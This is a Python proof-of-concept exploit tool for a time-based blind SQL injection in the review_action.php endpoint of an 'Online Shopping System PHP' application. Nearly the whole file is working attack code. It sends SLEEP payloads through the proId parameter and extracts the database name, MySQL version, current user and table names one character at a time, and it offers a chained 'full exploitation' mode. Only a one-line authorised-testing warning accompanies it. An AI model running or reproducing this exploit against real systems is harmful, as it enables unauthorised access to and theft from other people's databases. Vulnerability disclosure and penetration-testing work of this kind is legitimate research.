#!/usr/bin/env python3 """ CVE-2025-61246 - SQL Injection PoC Exploit Author: Govind Pratap Singh Description: Automated exploitation tool for time-based blind SQL injection in Online Shopping System PHP - review_action.php endpoint """ import requests import argparse import time import sys import string from urllib.parse import urlparse from colorama import Fore, Style, init # Initialize colorama init(autoreset=True) class SQLInjectionExploit: def __init__(self, target_url, timeout=5, proxy=None, verbose=False): self.target_url = target_url self.timeout = timeout self.proxy = {"http": proxy, "https": proxy} if proxy else None self.verbose = verbose self.session = requests.Session() self.session.headers.update({ 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36' }) def log(self, message, level="info"): """Print colored log messages""" colors = { "info": Fore.CYAN, "success": Fore.GREEN, "warning": Fore.YELLOW, "error": Fore.RED, "progress": Fore.MAGENTA } print(f"{colors.get(level, Fore.WHITE)}[{level.upper()}] {message}{Style.RESET_ALL}") def send_payload(self, payload): """Send SQL injection payload and measure response time""" data = {"proId": payload} try: start_time = time.time() response = self.session.post( self.target_url, data=data, timeout=self.timeout + 10, proxies=self.proxy, verify=False ) elapsed_time = time.time() - start_time if self.verbose: self.log(f"Payload: {payload[:50]}... | Response Time: {elapsed_time:.2f}s", "progress") return elapsed_time, response except requests.exceptions.Timeout: self.log("Request timeout - possible SQL injection confirmed", "warning") return self.timeout + 10, None except Exception as e: self.log(f"Error sending payload: {str(e)}", "error") return 0, None def detect_vulnerability(self): """Detect if the target is vulnerable to SQL injection""" self.log("Starting vulnerability detection...", "info") # Baseline request baseline_time, _ = self.send_payload("1") # Time-based SQL injection payload (5 second delay) sqli_payload = f"1' AND (SELECT 1 FROM (SELECT(SLEEP({self.timeout})))a)-- -" sqli_time, _ = self.send_payload(sqli_payload) # Check if there's a significant time difference if sqli_time - baseline_time >= self.timeout - 1: self.log("✓ Target is VULNERABLE to SQL Injection!", "success") self.log(f" Baseline: {baseline_time:.2f}s | SQLi: {sqli_time:.2f}s", "success") return True else: self.log("✗ Target does not appear vulnerable", "warning") self.log(f" Baseline: {baseline_time:.2f}s | SQLi: {sqli_time:.2f}s", "info") return False def extract_database_name(self): """Extract database name using time-based blind SQL injection""" self.log("Extracting database name...", "info") db_name = "" charset = string.ascii_lowercase + string.digits + "_" # First, get the length of database name for length in range(1, 50): payload = f"1' AND IF(LENGTH(DATABASE())={length}, SLEEP({self.timeout}), 0)-- -" elapsed_time, _ = self.send_payload(payload) if elapsed_time >= self.timeout - 1: self.log(f"Database name length: {length}", "success") break else: self.log("Could not determine database name length", "error") return None # Extract each character for position in range(1, length + 1): for char in charset: payload = f"1' AND IF(SUBSTRING(DATABASE(),{position},1)='{char}', SLEEP({self.timeout}), 0)-- -" elapsed_time, _ = self.send_payload(payload) if elapsed_time >= self.timeout - 1: db_name += char self.log(f"Database name: {db_name}", "progress") break self.log(f"✓ Database name extracted: {db_name}", "success") return db_name def extract_mysql_version(self): """Extract MySQL version""" self.log("Extracting MySQL version...", "info") version = "" charset = string.digits + "." for position in range(1, 20): found = False for char in charset: payload = f"1' AND IF(SUBSTRING(VERSION(),{position},1)='{char}', SLEEP({self.timeout}), 0)-- -" elapsed_time, _ = self.send_payload(payload) if elapsed_time >= self.timeout - 1: version += char self.log(f"MySQL Version: {version}", "progress") found = True break if not found: break self.log(f"✓ MySQL version: {version}", "success") return version def extract_current_user(self): """Extract current database user""" self.log("Extracting current database user...", "info") user = "" charset = string.ascii_lowercase + string.digits + "@._-" # Get length for length in range(1, 100): payload = f"1' AND IF(LENGTH(USER())={length}, SLEEP({self.timeout}), 0)-- -" elapsed_time, _ = self.send_payload(payload) if elapsed_time >= self.timeout - 1: self.log(f"User length: {length}", "success") break else: self.log("Could not determine user length", "error") return None # Extract each character for position in range(1, length + 1): for char in charset: payload = f"1' AND IF(SUBSTRING(USER(),{position},1)='{char}', SLEEP({self.timeout}), 0)-- -" elapsed_time, _ = self.send_payload(payload) if elapsed_time >= self.timeout - 1: user += char self.log(f"Current user: {user}", "progress") break self.log(f"✓ Current user: {user}", "success") return user def count_tables(self): """Count number of tables in current database""" self.log("Counting tables in database...", "info") for count in range(1, 100): payload = f"1' AND IF((SELECT COUNT(*) FROM information_schema.tables WHERE table_schema=DATABASE())={count}, SLEEP({self.timeout}), 0)-- -" elapsed_time, _ = self.send_payload(payload) if elapsed_time >= self.timeout - 1: self.log(f"✓ Number of tables: {count}", "success") return count self.log("Could not determine table count", "error") return None def extract_table_names(self, limit=5): """Extract table names from current database""" self.log(f"Extracting table names (limit: {limit})...", "info") tables = [] charset = string.ascii_lowercase + string.digits + "_" for table_index in range(limit): table_name = "" # Get table name length for length in range(1, 50): payload = f"1' AND IF(LENGTH((SELECT table_name FROM information_schema.tables WHERE table_schema=DATABASE() LIMIT {table_index},1))={length}, SLEEP({self.timeout}), 0)-- -" elapsed_time, _ = self.send_payload(payload) if elapsed_time >= self.timeout - 1: break else: break # No more tables # Extract each character for position in range(1, length + 1): for char in charset: payload = f"1' AND IF(SUBSTRING((SELECT table_name FROM information_schema.tables WHERE table_schema=DATABASE() LIMIT {table_index},1),{position},1)='{char}', SLEEP({self.timeout}), 0)-- -" elapsed_time, _ = self.send_payload(payload) if elapsed_time >= self.timeout - 1: table_name += char self.log(f"Table {table_index + 1}: {table_name}", "progress") break if table_name: tables.append(table_name) self.log(f"✓ Table extracted: {table_name}", "success") return tables def full_exploitation(self): """Perform full exploitation chain""" self.log("=" * 60, "info") self.log("CVE-2025-61246 - Full Exploitation Mode", "info") self.log("=" * 60, "info") if not self.detect_vulnerability(): self.log("Target is not vulnerable. Exiting.", "error") return print() # Extract information mysql_version = self.extract_mysql_version() print() current_user = self.extract_current_user() print() db_name = self.extract_database_name() print() table_count = self.count_tables() print() if table_count and table_count > 0: tables = self.extract_table_names(min(3, table_count)) print() self.log("=" * 60, "info") self.log("Exploitation Summary", "success") self.log("=" * 60, "info") self.log(f"MySQL Version: {mysql_version}", "info") self.log(f"Current User: {current_user}", "info") self.log(f"Database Name: {db_name}", "info") self.log(f"Table Count: {table_count}", "info") if tables: self.log(f"Sample Tables: {', '.join(tables)}", "info") self.log("=" * 60, "info") def print_banner(): """Print tool banner""" banner = f""" {Fore.RED}╔═══════════════════════════════════════════════════════════╗ ║ ║ ║ CVE-2025-61246 SQL Injection PoC ║ ║ Online Shopping System PHP - Exploit Tool ║ ║ ║ ║ Discovered by: Govind Pratap Singh ║ ║ ║ ╚═══════════════════════════════════════════════════════════╝{Style.RESET_ALL} """ print(banner) def main(): print_banner() parser = argparse.ArgumentParser( description="CVE-2025-61246 SQL Injection Exploitation Tool", formatter_class=argparse.RawDescriptionHelpFormatter, epilog=""" Examples: python exploit.py --url http://target.com/review_action.php --detect-only python exploit.py --url http://target.com/review_action.php --extract-db python exploit.py --url http://target.com/review_action.php --full-exploit python exploit.py --url http://target.com/review_action.php --proxy http://127.0.0.1:8080 """ ) parser.add_argument("-u", "--url", required=True, help="Target URL (review_action.php endpoint)") parser.add_argument("-d", "--detect-only", action="store_true", help="Only detect vulnerability") parser.add_argument("-e", "--extract-db", action="store_true", help="Extract database name") parser.add_argument("-f", "--full-exploit", action="store_true", help="Full exploitation mode") parser.add_argument("-t", "--timeout", type=int, default=5, help="SQL delay timeout (default: 5)") parser.add_argument("-p", "--proxy", help="Proxy URL (e.g., http://127.0.0.1:8080)") parser.add_argument("-v", "--verbose", action="store_true", help="Verbose output") args = parser.parse_args() # Validate URL try: result = urlparse(args.url) if not all([result.scheme, result.netloc]): print(f"{Fore.RED}[ERROR] Invalid URL format{Style.RESET_ALL}") sys.exit(1) except Exception: print(f"{Fore.RED}[ERROR] Invalid URL{Style.RESET_ALL}") sys.exit(1) # Initialize exploit exploit = SQLInjectionExploit( target_url=args.url, timeout=args.timeout, proxy=args.proxy, verbose=args.verbose ) # Execute based on arguments if args.detect_only: exploit.detect_vulnerability() elif args.extract_db: if exploit.detect_vulnerability(): print() exploit.extract_database_name() elif args.full_exploit: exploit.full_exploitation() else: # Default: detection only exploit.detect_vulnerability() print() print(f"{Fore.YELLOW}[WARNING] This tool is for authorized testing only!{Style.RESET_ALL}") if __name__ == "__main__": try: main() except KeyboardInterrupt: print(f"\n{Fore.YELLOW}[!] Interrupted by user{Style.RESET_ALL}") sys.exit(0) except Exception as e: print(f"{Fore.RED}[ERROR] {str(e)}{Style.RESET_ALL}") sys.exit(1)